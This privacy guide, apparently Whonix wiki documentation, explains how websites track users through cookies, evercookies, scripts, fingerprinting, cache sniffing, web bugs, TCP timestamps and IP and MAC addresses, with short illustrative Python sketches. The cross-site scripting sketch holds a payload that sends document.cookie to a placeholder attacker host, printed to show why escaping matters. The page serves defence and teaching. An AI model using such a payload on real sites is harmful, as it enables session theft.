
Data Collection Techniques

About this Data Collection Techniques Page
Support Status stable
Difficulty easy
Maintainer torjunkie
Support Support

Data Collection Techniques

Some of the techniques employed by data miners on the Internet are briefly introduced below.

Cookies

Introduction

Cookies have been in existence since 1994, when they were conceived by a programmer working for Netscape Communications as a reliable method for e-commerce applications. According to Wikipedia: [1]

An HTTP cookie (also called web cookie, Internet cookie, browser cookie, or simply cookie) is a small piece of data sent from a website and stored on the user's computer by the user's web browser while the user is browsing. Cookies were designed to be a reliable mechanism for websites to remember stateful information (such as items added in the shopping cart in an online store) or to record the user's browsing activity (including clicking particular buttons, logging in, or recording which pages were visited in the past). They can also be used to remember arbitrary pieces of information that the user previously entered into form fields such as names, addresses, passwords, and credit card numbers.

Cookie Classification

Whonix users are probably most familiar with third-party cookies since they can be used to track browsing history via web page content sourced from external websites, such as banner advertisements. However, cookies have a range of both useful and potentially harmful applications: [2]

  • Authentication cookies: Used by web servers to know whether a user is logged in, and the account being used.
  • Session cookies: Exist temporarily in memory while a website is navigated and are normally deleted when the browser is closed.
  • Persistent cookies: Expire after a specific period of time, or on a set date. They transmit information to servers every time a user browses websites that are associated with the cookie. Persistent cookies can track a user's browsing habits over an extended period, possibly years. [3]
  • Secure cookies: Transmitted over encrypted (HTTPS) connections, making them less vulnerable to cookie theft.
  • Third-party cookies: Belong to domains that are different from the URL shown in the web browser address bar. Tracking is enabled via the following process:
    • Website A contains an advertisement served by eviladvertiser.org
    • A cookie belonging to eviladvertiser.org is downloaded and stored on the user's computer.
    • Website B is visited and also contains advertising content from eviladvertiser.org, setting another cookie belonging to that domain.
    • Both cookies are eventually sent to eviladvertiser.org, and an extensive profile of browsing history is gradually acquired over time.
  • Supercookies: Have an origin of a top-level domain like .org or a public suffix such as .com.de. If not blocked by the browser, adversaries in control of malicious websites can set supercookies and then impersonate or disrupt user requests to another website sharing the same top-level domain or public suffix.
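The third-party tracking steps above can be sketched as a small simulation. This is an illustrative model only, not how any real advertising network is implemented: the `AdServer` and `Browser` classes and the example site names are hypothetical, and for simplicity the advertiser reuses a single identifier instead of setting a separate cookie per site.

```python
import uuid
from collections import defaultdict


class AdServer:
    """Hypothetical third-party server (eviladvertiser.org in the text)."""

    def __init__(self):
        # visitor identifier -> list of sites on which the ad was loaded
        self.profiles = defaultdict(list)

    def serve_ad(self, cookie, embedding_site):
        # Reuse the identifier from the cookie, or mint one on first contact.
        visitor_id = cookie or uuid.uuid4().hex
        self.profiles[visitor_id].append(embedding_site)
        return visitor_id  # sent back to the browser as the cookie value


class Browser:
    """Hypothetical browser that accepts third-party cookies."""

    def __init__(self):
        self.cookie_jar = {}  # cookie domain -> cookie value

    def visit(self, site, ad_server, ad_domain="eviladvertiser.org"):
        # Loading the embedded ad sends any existing cookie for ad_domain.
        cookie = self.cookie_jar.get(ad_domain)
        self.cookie_jar[ad_domain] = ad_server.serve_ad(cookie, site)


ads = AdServer()
browser = Browser()
browser.visit("website-a.example", ads)
browser.visit("website-b.example", ads)
print(dict(ads.profiles))  # one identifier mapped to both visited sites
```

The advertiser never needs to be visited directly; being embedded on both sites is enough to link the two visits.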

Evercookies

Since 80% of users disapprove of tracking while browsing the Internet, many have progressively started to delete cookies using relevant browser settings and extensions. Advertisement and tracking networks have responded in kind, using more sophisticated methods - evercookies - to distinguish users.

Evercookies come in various forms:

  • Entity tag (ETag) cookies: HTTP supports simple cache control mechanisms, including ETags which store either a version number or a user identifier (ETag cookie). The purpose is to save bandwidth and have browsers use caches for web content when it has not changed, instead of reloading the complete web server content again. [4] Unfortunately this provides a tracking mechanism which can be persistently stored, and has been used by various websites including Hulu.com. ETag cookies can be, and often are, respawned. [5]
  • Zombie cookies: Automatically recreated after being deleted. Cookie content is stored in multiple locations such as HTML5 web storage, Flash local shared objects, and other client-side and server-side locations. When the cookie is deleted on a user's computer, the deletion is detected and the cookie is restored from one of the other storage locations.
  • Flash cookies (LSOs): Flash cookies are also known as local shared objects (LSOs) and store data from websites that use Adobe Flash. User permission is not sought when cookies are stored, and they are stored outside of the normal browser local storage system. [6] Previously, it was difficult to delete Flash cookies, as they could not be located easily with browsers. [7] However, modern browsers, extensions and software have relevant settings to easily remove them. [8] LSOs can be used to: [9]
    • Store and retrieve information from local storage when a user accesses webpages with a Flash application.
    • Store user preferences.
    • Save data from Flash games.
    • Track users' Internet activity, even across different browsers. For example:
      • Firefox is used to visit a site showing a relevant product.
      • Firefox is closed, but that information was stored in an LSO.
      • The same person on the same machine uses Chrome to access a website viewed in Firefox.
      • The website is able to read the LSO value(s) in Chrome, and display relevant content or targeted information.
  • HTML5 DOM cookies: Allow web application software to store data persistently in a manner similar to cookies. Local storage and session-only storage are both possible. The storage size is far greater than that available to cookies, but it is not automatically transmitted on every HTTP request. Instead, client-side scripts allow the desired interaction with the server. It is possible to remove DOM cookies without about:config changes in Firefox [10], by using relevant extensions (like Click&Clean or BetterPrivacy), or by waiting for Firefox 58 which will disable them by default. Tor Browser defends against this by default. [11]
  • Samy Kamkar has shown that there are other possible methods to track Internet users using evercookies.
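The respawning behavior of zombie cookies described above can be illustrated with a minimal sketch. The `SimulatedBrowser` class, the store names and the `sync_evercookie` function are hypothetical stand-ins; real evercookie scripts run as JavaScript in the browser and use many more storage locations.

```python
class SimulatedBrowser:
    """Hypothetical browser exposing several independent storage areas."""

    STORES = ("http_cookie", "html5_local_storage", "flash_lso")

    def __init__(self):
        self.stores = dict.fromkeys(self.STORES)  # every store starts empty


def sync_evercookie(browser, fresh_id):
    """Restore the identifier to every store and return the one in use."""
    # Look for a copy of the identifier that survived in any store.
    surviving = next((v for v in browser.stores.values() if v is not None), None)
    visitor_id = surviving if surviving is not None else fresh_id
    # Write the identifier back everywhere, respawning deleted copies.
    for name in browser.stores:
        browser.stores[name] = visitor_id
    return visitor_id


browser = SimulatedBrowser()
first = sync_evercookie(browser, "id-1234")    # first visit
browser.stores["http_cookie"] = None           # user deletes the HTTP cookie
second = sync_evercookie(browser, "id-9999")   # next visit
print(first == second)
```

Deleting only one storage location is ineffective in this model, because any surviving copy is enough to restore the rest.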


In a study by the University of California, Berkeley, the methods of Space Pencil Inc. (aka KISSmetrics) were exposed. In addition to cookies and Flash cookies, KISSmetrics used cache cookies via ETags, DOMStorage and IE-userData to distinguish each user. KISSmetrics was sued as a result and dispensed with using ETags. It also allegedly now respects the Do Not Track HTTP header. [12]

Tor Browser, which comes with Whonix, resists evercookies.

Cookie Threats


It is evident that cookies are useful for website personalization, logins, monitoring purchases and other functions, but they also present a dire tracking threat. The average website places 34 cookies on a device on the first visit, and 70 percent of these are third-party cookies. Expiry dates are often set to the year "9999", indicating there is no intention to ever stop recording user behavior. [14]

The tracking service Yahoo! Web Analytics has made claims of being able to set cookies on 99.9% of users. This indicates that cookie-generating JavaScript and/or Flash cookies are deployed as the primary mechanisms.

A 2011 study by the University of California, Berkeley found that the top 100 websites at that time stored a total of 5,675 cookies. Of these, 4,914 cookies were set by third party domains and not the first-party domain being purposefully visited by the user. When browsing these 100 websites, data was transmitted to 600 servers.

Cookie security is dependent on whether cookie data is encrypted, since adversaries may otherwise use this information to gain access to user data or to access websites with the user's credentials. Examples of this attack include cross-site scripting and cross-site request forgery.

As well as gathering the IP address and/or the HTTP referrer field of the computer requesting the web page, cookies can also store the requested URL and the date/time of the request. Web hosts are therefore capable of recording a large proportion of browsing behavior over many years, and correlating the accumulated profile data with individuals. The typical Internet user has collected hundreds of cookies from various websites on their PC without their knowledge. For instance, the following figure exhibits a small number of the cookies that are stored when a request is made to www.nytimes.com.

Figure: Cookies set by the New York Times



Most modern browsers integrate an optional function to block cookies, but the option has to be first set by the user. Tor Browser, which comes bundled with Whonix, has activated cookie blocking by default. Firefox has also adopted Tor Browser's first party isolation feature since version 55, meaning cookies are separated on a per-domain basis. Advertisement trackers are unable to see all the cookies stored on a user's computer (only the cookie for the currently viewed domain), meaning they cannot aggregate persistent cookie data for profiling. In the future, it is expected that more functions will become available to administrate preferences and acquired cookie collections.
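To make the first party isolation idea concrete, here is a minimal sketch of a cookie jar that is keyed by the site shown in the address bar as well as by the cookie's own domain. The `CookieJar` class and the example domains are hypothetical; the actual implementations in Tor Browser and Firefox are considerably more involved.

```python
class CookieJar:
    """Toy cookie jar with optional first party isolation."""

    def __init__(self, first_party_isolation):
        self.first_party_isolation = first_party_isolation
        self._store = {}

    def _key(self, cookie_domain, first_party):
        # With isolation, the same tracker gets a separate jar per visited site.
        if self.first_party_isolation:
            return (first_party, cookie_domain)
        return (None, cookie_domain)

    def set(self, cookie_domain, first_party, value):
        self._store[self._key(cookie_domain, first_party)] = value

    def get(self, cookie_domain, first_party):
        return self._store.get(self._key(cookie_domain, first_party))


shared = CookieJar(first_party_isolation=False)
shared.set("tracker.example", "site-a.example", "visitor-42")
print(shared.get("tracker.example", "site-b.example"))    # identifier is visible

isolated = CookieJar(first_party_isolation=True)
isolated.set("tracker.example", "site-a.example", "visitor-42")
print(isolated.get("tracker.example", "site-b.example"))  # nothing to read
```

In the isolated jar the tracker embedded on the second site cannot read the identifier it set on the first, so the two visits cannot be linked through that cookie.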

Active Web Contents

Web content that is accessible by browser plugins such as Flash, Java, ActiveX and Silverlight renders the Web more dynamic and colorful. However, permissions are also granted to websites to execute code locally on a machine, increasing the security risks. If executed, these plugins can read a host of details about the user's computer and network configuration and send it to a remote server. Certain techniques even permit files to be read and edited on the user's machine, and in extreme cases this allows complete control over it.


Limiting browsing to trusted websites does not mitigate the risk from applets. In the recent past, numerous popular websites have been hacked and infected with malicious code. Greater security requires these plugins to be blocked, deactivated or removed.

In Whonix, an adversary will not benefit from learning the IP address via this method: it is either a local IP address shared among all Whonix users or the IP address of a Tor exit relay, both of which do not reduce the user's anonymity set. Further, the MAC address is a virtual one which is also shared among all Whonix users, and is therefore worthless to attackers. Although active content will not reveal the real IP address, it is deactivated in Tor Browser by default. See Browser Plugins for a detailed discussion of browser plugins in Whonix and the potential effects on anonymity, security, and privacy.

JavaScript

Introduction

JavaScript is one of the core technologies for Internet content production, alongside HTML and CSS. It allows sites to be interactive and dynamic, and supports online applications such as video games. In contrast, HTML is a markup language that is used to create static content on sites, and Cascading Style Sheets (CSS) are designed for presentation such as interfaces, layout, colors and fonts. Modern browsers frequently use JavaScript ("scripts", "active scripting") and it is marginally safer against security and privacy vulnerabilities compared to the aforementioned plugins.

In the past, JavaScript has been responsible for an estimated 84% of all security vulnerabilities on the Internet via cross-site scripting. This attack allows adversaries to inject malicious client-side script into web pages, leading to users being redirected to malicious sites that phish for login credentials, bank accounts, personal information, or other sensitive data. [16] Similarly, JavaScript can be used by web hosts to access detailed information about a user's browser, desktop setting, operating system and hardware specifications, which forms a unique digital fingerprint of an individual. [17] [18]

JavaScript Attack Classification

JavaScript is essential to a fully functional browsing experience, but several classes of attacks rely upon it and are often successful: [19] [20] [21]

  • Malicious JavaScript email attachments: When a harmless looking document is opened by the user, ransomware is downloaded to the HDD/SSD, later encrypting the computer and demanding a ransom to unlock the files.
  • Drive-by download attacks: When users visit a compromised website running malicious code, [22] users are redirected to another site controlled by the attackers. Attackers then run code in the victim's web browser that loads an exploit kit which probes the user's OS, browser and software to find vulnerabilities. Payloads/malware are then downloaded that access personal data, encrypt the computer or carry out other criminal activity.
  • Cross-site scripting: Since the 1990s it has been possible to inject JavaScript client-side into web-based applications, servers or plug-in systems, bypassing the same-origin policy. After successful exploitation, users visiting the compromised site are served malicious content which is presumed to be from a trusted source. Attackers can then access sensitive page content, session cookies and other information.
  • Universal cross-site scripting: Vulnerabilities in the browser or plugins are exploited to take control over the network. For example Firefox and other browsers, as well as plugins like Flash and ActiveX controls, all have flaws which can lead to buffer overflows. These are often exploitable via JavaScript and allow attackers to gain access to the OS's Application Programming Interface (API) with root privileges. [23]
  • Cross-site request forgery: Unauthorized commands are transmitted from a user by trusted web applications. Malicious websites can use specially crafted image tags, hidden forms, and JavaScript XMLHttpRequests for this purpose. Depending on the specific vulnerability, when these elements are clicked by the user, the attacker may be able to:
    • Execute remote code with root privileges.
    • Forge login requests and view private information.
    • Change personal information or fully compromise online accounts.
    • Conduct illicit money transfers.
    • Perform nearly all actions of a logged in user.
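As an illustration of the cross-site scripting item above, the following sketch shows how a page that echoes user input verbatim ends up containing attacker-supplied script, while the same input passed through Python's standard `html.escape` is rendered as inert text. The two render functions, the payload and the `attacker.example` URL are hypothetical examples, not taken from any real application.

```python
import html


def render_comment_unsafe(comment: str) -> str:
    # User input is concatenated into the page without any encoding.
    return "<p>" + comment + "</p>"


def render_comment_escaped(comment: str) -> str:
    # Special characters are HTML-encoded, so the browser shows them as text.
    return "<p>" + html.escape(comment) + "</p>"


payload = (
    '<script>new Image().src='
    '"https://attacker.example/?c=" + document.cookie</script>'
)

print(render_comment_unsafe(payload))   # contains a live <script> element
print(render_comment_escaped(payload))  # contains &lt;script&gt; instead
```

A visitor's browser would execute the first output as part of the trusted site, which is how session cookies and page content become accessible to the attacker.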

Session Replay Scripts

Enabling JavaScript does more than reveal additional information about a user's system and increase the probability of a successful browser exploit. It can also lead to a complete, literal recording of the entire browsing session if the user is unlucky enough to browse one of nearly 500 sites in the Alexa top 50,000: [24] [25]

You may know that most websites have third-party analytics scripts that record which pages you visit and the searches you make. But lately, more and more sites use “session replay” scripts. These scripts record your keystrokes, mouse movements, and scrolling behavior, along with the entire contents of the pages you visit, and send them to third-party servers. Unlike typical analytics services that provide aggregate statistics, these scripts are intended for the recording and playback of individual browsing sessions, as if someone is looking over your shoulder.

The law as it stands allows corporate entities to embed JavaScript functions on sites in order to record highly personal information. This includes what is typed, exact movements of the mouse, and even "co-browsing", whereby an unseen intruder can watch what is done in real time, without any form of notification. There are few limits to the data harvested; name, email, phone number, address, social security numbers and date of birth are all considered fair game by companies like FullStory, Hotjar, and Smartlook. Many offer the option to explicitly link recordings to real identities.

Although full or part redactions are attempted on passwords, credit card numbers, CVC numbers, and credit card expiry dates, sensitive information was found to leak in many instances, such as: [26]

  • Passwords entered into registration forms.
  • Leaking of credit card details on payment pages, even in real time.
  • Leaking of specific medical conditions and prescriptions.


The same tracking companies often use insecure HTTP pages to deliver the recording playbacks or publisher page contents, providing an enticing man-in-the-middle attack opportunity for advanced adversaries. [27] Fortunately, disabling JavaScript is sufficient to prevent this activity completely, and ad-blocking lists are also useful in preventing data exfiltration. [28] Users should not solely rely on ad-blockers for general tracking protection, as tools have already been developed which successfully defeat the most popular extensions, including Adblock Plus, Adblocker Ultimate, Ghostery and uBlock Origin.

Conclusion

Enabling or Disabling JavaScript

JavaScript presents a clear and present danger across a host of attack vectors. However, there is a security versus privacy trade-off to consider before disabling JavaScript completely: [29]

The take-home message is disabling all JavaScript with white-list based, pre-emptive script-blocking may better protect against vulnerabilities (many attacks are based on scripting), but it reduces usability on many sites and acts as a fingerprinting mechanism based on the select sites where it is enabled. On the other hand, allowing JavaScript by default increases usability and the risk of exploitation, but the user also has a fingerprint more in common with the larger pool of users.

Safest Browser Against Exploitation

It is clearly unwise to browse the Internet without a well secured browser, otherwise there is a danger of a browser exploit leading to an infected system. Personally configuring a browser to be secure is an enormous effort requiring expertise and significant trial and error. The safer path is to use Tor Browser, preferably on a Whonix platform, since it is already hardened against data leakage. As noted in the Tor Browser chapter:

Tor Browser is a fork of the Mozilla Firefox web browser. It is developed by The Tor Project and optimized and designed for Tor, anonymity and security.

...

Features like proxy obedience, state separation, network isolation, anonymity set preservation and a host of others are simply unsupported by other browsers.

In stark contrast to regular browsers, Tor Browser is optimized for anonymity and has a plethora of privacy-enhancing patches and add-ons. With Tor Browser, the user "blends in" and shares the Fingerprint of nearly three million other users, which is advantageous for privacy.


Tor Browser blocks most dangerous technologies by default, but most popular websites like YouTube will still work correctly. For media portals which rely on Flash or alternative plugins, the user can download the relevant files with special software and then view them with an open source media player like VLC. Websites that insist on the use of active plugins should be avoided; see Browser Plugins.

Browser Fingerprinting

Research from a pool of 500,000 Internet users has shown that the vast majority (84%) have unique browser configurations and version information which makes them trackable across the Internet. When Java or Flash is installed, this figure rises to 94%. [30] Considering this research relied only on a relatively small number of variables, [31] companies with advanced fingerprinting capabilities may be approaching 100%, particularly in combination with cookies.

Fingerprinting and Anonymity


For anonymity, it is necessary to reduce the number of bits of information (entropy) the browser provides to an acceptable lower bound; for instance, 18.1 bits of entropy means that a browser chosen at random will share the fingerprint with one in 286,777 other browsers. [33] Browser uniqueness research has revealed the entropy associated with various pieces of browser information: [34]

Variable Entropy (bits)
Plugins 15.4
Fonts 13.9
User agent 10.0
HTTP accept 6.09
Screen resolution 4.83
Time zone 3.04
Supercookies 2.12
Cookies enabled 0.353
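The relationship between bits of entropy and "one in N browsers" can be checked with a short calculation. The function names below are illustrative. Note that the per-variable figures in the table cannot simply be added together, since the variables are not independent of one another.

```python
import math


def bits_to_one_in(bits: float) -> float:
    """Number of browsers among which one fingerprint is expected to be unique."""
    return 2.0 ** bits


def one_in_to_bits(n: float) -> float:
    """Bits of identifying information carried by a 1-in-n fingerprint."""
    return math.log2(n)


print(bits_to_one_in(10.0))                 # user agent row of the table
print(round(one_in_to_bits(286_777), 1))    # the one-in-286,777 figure
```

Converting 286,777 back to bits gives approximately 18.1, matching the figure quoted in the text. Going the other way from the rounded value of 18.1 bits gives roughly 281,000, so small differences between the two directions are a rounding effect.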

The primary browser fingerprinting methods that are used include: [35] [36]

  • Plugins: The PluginDirect JavaScript library checks for common plugins on the respective platform, and code is run to check for the Acrobat Reader version. Other information may be leaked, including the CPU type.
  • Fonts: System fonts are collected by Flash or Java applets, or by CSS introspection.
  • User Agent string: When websites are visited, the browser sends precise information on the operating system and web browser being used. [37]
  • HTTP Accept headers: With every webpage request, the browser sends information within the HTTP protocol framework that can be analyzed. This includes language, browser type and version, operating system and version, supported character sets, file codecs, and the last visited webpage.
  • Screen resolution: The exact resolution is revealed to websites, for example 1280x800x24. [38]
  • Supercookies: Reported entropy depends on whether the following are enabled: DOM localStorage, DOM sessionStorage, userData, Flash LSOs, Silverlight cookies, HTML5 databases, or DOM globalStorage.
  • Clock skew/precision measurements: Differential parameters are used to measure the time difference (down to milliseconds) between a user's computer and that of the server. Clock precision measurements rely upon how long operations take on a particular system.
  • HTML5 canvas: A precise fingerprint is provided by the rendering of WebGL, font and color data to a canvas element. This is then extracted from the image buffer, and an identifying hash is computed. For more information, see here.
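The way individually harmless attributes combine into a single identifier can be sketched as follows. The attribute names and values are made-up examples and the `fingerprint` function is hypothetical; real fingerprinting scripts collect these values in the browser and typically use many more inputs.

```python
import hashlib
import json


def fingerprint(attributes: dict) -> str:
    """Hash a set of browser attributes into one stable identifier."""
    # Serialize with sorted keys so the same attributes always hash identically.
    canonical = json.dumps(attributes, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


visitor = {
    "user_agent": "ExampleBrowser/1.0 (ExampleOS)",
    "accept_language": "en-US,en;q=0.5",
    "screen": "1280x800x24",
    "timezone_offset_minutes": -60,
    "fonts": ["DejaVu Sans", "Liberation Serif"],
    "plugins": [],
}

print(fingerprint(visitor))
```

No cookie is stored in this model: the identifier is recomputed from the browser's own characteristics on every visit, which is why deleting cookies does not help against it.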

Fingerprinting Resistance

The EFF has found that while most browsers are uniquely fingerprintable, resistance is afforded via four methods:

  • Disabling JavaScript with tools like NoScript.
  • Use of Torbutton, which is bundled with Tor Browser and enabled by default. [39]
  • Use of mobile devices like Android and iPhone.
  • Corporate desktop machines which are clones of one another.


With JavaScript disabled, Tor Browser provides significant resistance to browser fingerprinting: [40]

  • The User Agent is uniform for all Torbutton users.
  • Plugins are blocked.
  • The screen resolution is rounded down to 50 pixel multiples.
  • The timezone is set to GMT.
  • DOM Storage is cleared and disabled.
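The effect of rounding the screen resolution can be shown with a small sketch. It models only the rule stated in the list above (rounding down to multiples of 50 pixels); the function name is illustrative and the actual Tor Browser behavior may differ in detail.

```python
def round_down_resolution(width: int, height: int, step: int = 50) -> tuple:
    """Round both dimensions down to the nearest multiple of `step` pixels."""
    return (width // step) * step, (height // step) * step


# Two different real resolutions report the same rounded value.
print(round_down_resolution(1366, 768))
print(round_down_resolution(1360, 760))
```

Because many distinct resolutions collapse into the same reported value, this variable contributes fewer identifying bits.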


At the time of writing, Panopticlick only returns 6.63 bits of information for Tor Browser with JavaScript disabled. This is equivalent to sharing the same fingerprint as 1 in 99 other browsers due to the 3 million strong pool of near-identical users. That said, fingerprinting defense is not perfect in any browser and there are still open bugs, see TBB-linkability and TBB-fingerprinting.

Browser History and Cache

A publication from the University of California provides an analysis of the top 50,000 websites. 1% of these websites collect information about web surfers via history sniffing. Using malicious JavaScript code and CSS hacks, information about previously visited websites was collected. Webmasters who are not familiar with sniffing technologies can use services like Tealium or Beencounter for real-time history sniffing.

Collected information is not only used for advertisements. It can be used for de-anonymization of surfers too. A publication from Isec shows one possible way. Using the browser history the visited groups of the social network site Xing were collected. Because there are generally no two people who are members of the exact same set of groups in a social network, it was possible to get the real names and e-mail addresses of the users.

By certain trickery, websites can tell which websites are saved in your browser history. For this, the visited website embeds special formatting commands (CSS Stylesheets) that contain external links "of interest" on the pages you visit. If you have visited one of the external websites before, your browser will react by executing a command defined in the format, e.g. download a small picture from the website. The website can thereby largely guess the contents of your browser history.

The contents of your browser cache reveal which websites are already cached and have therefore been visited before. Together with every website an ETag is sent by the server and stored in the browser cache. When the website is requested again, the ETag is sent first to ask for changes. This tag may contain a unique user ID. KISSmetrics was using ETags in this way to identify visitors of some top 100 websites.
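The ETag mechanism described above can be sketched from the server's point of view. The `EtagTrackingServer` class is a hypothetical model: it only mimics the exchange of the `ETag` response header and the `If-None-Match` request header, and does not speak real HTTP.

```python
import uuid


class EtagTrackingServer:
    """Toy server that abuses the ETag cache validator as a visitor ID."""

    def __init__(self):
        self.visits = {}  # ETag value -> number of requests seen

    def handle_request(self, if_none_match=None):
        """Return (status_code, etag) for one request to a cached resource."""
        if if_none_match in self.visits:
            # The browser replayed a known ETag: a returning visitor.
            self.visits[if_none_match] += 1
            return 304, if_none_match
        # Unknown or missing ETag: issue a fresh, unique one.
        etag = uuid.uuid4().hex
        self.visits[etag] = 1
        return 200, etag


server = EtagTrackingServer()
status, etag = server.handle_request()                     # first visit
status_again, _ = server.handle_request(if_none_match=etag)  # cached revisit
print(status, status_again, server.visits[etag])
```

The browser believes it is merely validating its cache, while the server uses the replayed value to recognize the visitor even when cookies have been cleared.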

Additionally, the time required for loading a website changes when part of it is already in the browser cache. By subtle placement of the images on the website, the server can analyze the cache one by one.

At the moment, there is no reliable protection against the analysis of browser histories apart from deactivating this feature, which has been made the default in Tor Browser.

Unlike deactivating your browser history, deactivating your cache would have a tremendous effect on your surfing speed, which is why we don't recommend it. In Tor Browser a protective mechanism has been integrated instead which bypasses the cache for third party content. Also, the cache is deleted automatically when you close the browser. A website can thus only gain information about itself, not about other websites.

Webbugs and Banner Ads

Very likely, you will find one or more cookies in your browser from data miners such as doubleclick.com, advertisement.com or Google, although you may have never even visited their websites. This is because these enterprises use a simple trick on other websites to plant cookies in your browser and watch your browsing: Webbugs.

"Webbugs" are usually pictures of 1 pixel by 1 pixel which are therefore invisible to the viewer. However, they can also be coded into banner ads embedded in a website. The website contains a picture (webbug) that is loaded from another server running a statistics service (such as Doubleclick or Google Analytics). Thereby the statistics service may set or edit a cookie in your browser unnoticeably. The browser will then send this cookie back to the statistics service with every new request for a site where any webbug of this service is embedded. If the service is used on many different websites, it can now track large parts of your browsing session. If the owner of the statistics service moreover collaborates with the owner of your preferred search engine, he gets an almost complete picture of your Internet activities.

The privacy functions of most current browsers of simply rejecting cookies and/or deleting them upon browser shutdown do not achieve optimal protection from web bugs.

Another nasty feature of webbugs is that, besides cookies, they also send your IP address to the statistics service with every request. Even with a very good browser configuration, including switching off cookies and using webbug filters, you are never able to reliably prevent this. The only effective methods of protection against this are anonymization services like Tor.

TCP Timestamps

The Transmission Control Protocol (TCP) is a transport-layer protocol for transferring data between computers. It is necessary for using Internet protocols like HTTP (WWW), SMTP (email) and FTP. When your computer sends a request for a web site, for example, this data is sent within many small TCP packets. Besides that request data, a TCP packet also contains some optional information fields in the header (metadata). One of those optional fields is the TCP timestamp. The value of this timestamp is proportional to the current time of your computer and is incremented according to your computer's internal clock.

The timestamp may be used by the client and/or server machine for performance metrics and optimization. However, an Internet server may recognize and track your computer by observing those timestamps: By measuring the clock skew of the timestamps, it may calculate an individual clock skew profile for your computer. Moreover, it may estimate the time when your machine was last booted. These tricks work even if you have otherwise perfectly anonymised your Internet connections.
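A rough sketch of how a clock skew profile could be derived from observed timestamps is given below. It assumes the observer records its own receive time alongside each TCP timestamp value and knows (or guesses) the sender's nominal tick rate; the function name, the 1000 Hz rate and the synthetic 50 ppm drift are illustrative assumptions, and published techniques use more robust fitting than plain least squares.

```python
def estimate_clock_skew_ppm(samples, nominal_hz):
    """Least-squares estimate of a sender's clock skew in parts per million.

    samples: list of (receiver_time_seconds, tcp_timestamp_ticks) pairs,
             at least two with distinct receiver times.
    nominal_hz: assumed tick rate of the sender's timestamp clock.
    """
    t0, ticks0 = samples[0]
    # Elapsed time according to the observer.
    xs = [t - t0 for t, _ in samples]
    # Offset between the sender's elapsed time and the observer's.
    ys = [(ticks - ticks0) / nominal_hz - x for x, (_, ticks) in zip(xs, samples)]
    mean_x = sum(xs) / len(xs)
    mean_y = sum(ys) / len(ys)
    numerator = sum((x - mean_x) * (y - mean_y) for x, y in zip(xs, ys))
    denominator = sum((x - mean_x) ** 2 for x in xs)
    # The slope of offset over time is the relative clock drift.
    return numerator / denominator * 1e6


# Synthetic observations: one sample per minute for an hour from a
# sender whose clock runs 50 ppm fast at a nominal 1000 ticks per second.
observed = [(t, round(t * 1000 * (1 + 50e-6))) for t in range(0, 3601, 60)]
print(round(estimate_clock_skew_ppm(observed, nominal_hz=1000), 1))
```

The estimated drift is a property of the sender's hardware clock, which is why it can act as an identifier independent of the IP address in use.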

If you are using Whonix, however, you are protected against being observed this way. The clock in Whonix-Workstation does not match your clock on the host and the clock in Whonix-Workstation is set securely by sdwdate over https, which will result in slightly different results compared to using the more accurate NTP.

If you are using Tor, you are also being protected against being profiled in another way: The Tor relays automatically replace your potentially insecure TCP packets with their own.

source 1: Tor trac #8169 replace TCP timestamp source 2: Tor wiki FAQ

IP Address

The IP address is assigned to you by your provider when you connect to the Internet. The provider usually saves it for months or even years together with your customer data and your online time. It is your distinct identifier on the Internet which is sent along whenever you make a direct connection to any Internet service. The IP address tells the server where to send its response. As long as your IP does not change, it is easy to monitor when and what website you have contacted. The IP also reveals your provider, often your location, and sometimes (in case of a company or computer center) even what terminal you are on. In many cases, an IP address relates directly to one person.

What your IP address reveals:

  • Your current whereabouts

The country and the city/region where you are. With the help of free or commercial databases, even districts and office buildings can be identified. This is called geolocation.

  • Your Internet-provider

Personal data can be retrieved using your provider.

  • Your access technology

With the help of databases one can find out whether you are using, for instance, DSL, a modem or a mobile device to surf the Web.

  • Your company / your authority

In the case where you are surfing from within the network of a company or an authority, its name can be found out.

Some of the information that is given away by your IP or browser can be reviewed on ip-check.info.

While the traces mentioned so far can be blurred without any special services needed, the same cannot be said about your IP address. That is why Tor has been developed: to blur any connection between your IP and the websites you visit. Whonix connects to the Tor network; see How Tor works.

MAC Address

The Media Access Control (MAC) address is the hardware address of each individual network device. It is sometimes referred to as the Ethernet-ID, Airport-ID, or physical / hardware / adapter address. Standard computer systems may have several physical or virtual network devices. These devices can be bound to a cable (LAN), wireless (WLAN), mobile (GPRS, UMTS) or virtual (VPS) environment, or another setup.


The MAC address serves as a unique identifier for the respective device in a local area network. Unless the computer is infected with malware designed to disclose this identifier, it is neither used nor transmitted on the Internet. Also, an access provider can only see the MAC address if the computer is connected directly to the Internet (for example by a modem), rather than over a router.

Despite the limited risk of disclosure, MAC addresses can be used for tracking purposes by adversaries. For instance, other computers on the local network can potentially log it, which would then provide proof that the user's computer has been connected to a specific network. Moreover, advanced tracking techniques exist that are able to enumerate the MAC address of a Wi-Fi card in use, by examining its physical characteristics. For these reasons MAC spoofing should be considered for particular circumstances, like when an untrusted, public network will be used. See the MAC address entry for further information.
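As a minimal sketch of what a spoofed address looks like, the following generates a random MAC address with the "locally administered" bit set and the multicast bit cleared in the first octet, which marks it as not being a vendor-assigned hardware address. The function names are illustrative, and the code only produces the address string; actually applying it to a network interface is operating system specific and not shown here.

```python
import secrets


def random_locally_administered_mac() -> str:
    """Return a random unicast MAC address with the local bit set."""
    octets = bytearray(secrets.token_bytes(6))
    # Set bit 0x02 (locally administered) and clear bit 0x01 (multicast).
    octets[0] = (octets[0] | 0x02) & 0xFE
    return ":".join(f"{octet:02x}" for octet in octets)


def is_locally_administered(mac: str) -> bool:
    """Check the locally administered bit of the first octet."""
    return bool(int(mac.split(":")[0], 16) & 0x02)


mac = random_locally_administered_mac()
print(mac, is_locally_administered(mac))
```

A fully random address is itself distinctive on a network where all other devices use vendor-assigned addresses, so whether and how to spoof remains the judgment call the text describes.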

HTML5 Canvas Image Data

Websites routinely request browser configuration settings in order to help select the best page format for the visitor. One of those variables is HTML5 canvas image data, which is related to graphical rendering. Canvas is a drawable region in HTML code with height and width attributes, and JavaScript code can access this area through a large set of drawing functions related to animation, games, images and so on.[43]

When combined with other exposed browser settings this can be enough to uniquely identify an individual, even without access to the specific IP address. [44]

The Tor Project provides a good explanation of this fingerprinting method: [45]

After plugins and plugin-provided information, we believe that the HTML5 Canvas is the single largest fingerprinting threat browsers face today. Studies show that the Canvas can provide an easy-access fingerprinting target: The adversary simply renders WebGL, font, and named color data to a Canvas element, extracts the image buffer, and computes a hash of that image data. Subtle differences in the video card, font packs, and even font and graphics library versions allow the adversary to produce a stable, simple, high-entropy fingerprint of a computer. In fact, the hash of the rendered image can be used almost identically to a tracking cookie by the web server.

